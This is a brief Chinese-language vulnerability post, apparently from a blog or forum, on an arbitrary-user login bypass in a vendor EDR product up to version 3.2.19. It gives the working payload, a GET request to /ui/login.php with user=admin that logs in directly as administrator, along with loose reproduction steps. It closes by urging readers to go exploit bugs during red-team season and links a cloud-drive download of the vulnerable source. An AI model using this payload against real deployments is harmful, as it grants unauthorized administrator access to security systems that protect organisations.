0x00漏洞编号
暂无
0x01漏洞名称
某某服EDR任意用户登录漏洞
0x02影响范围
EDR <= v3.2.19
0x03攻击方式
攻击者可以通过构造payload绕过登录判断
/ui/login.php?user=admin
0x04复现过程
找到一个
浏览器直接输入
url输入payload 成功进入
http://ip/ui/login.php?user=admin (大概是这样的)
可以看到直接进来了
0x05 总结
hw期间0day满天飞,赶紧学习刷洞去,哈哈哈
0x06 漏洞源码
下载后直接导入虚拟机
链接:https://pan.baidu.com/s/14c-5aw_NoK3wiztfchAg-w
提取码:key8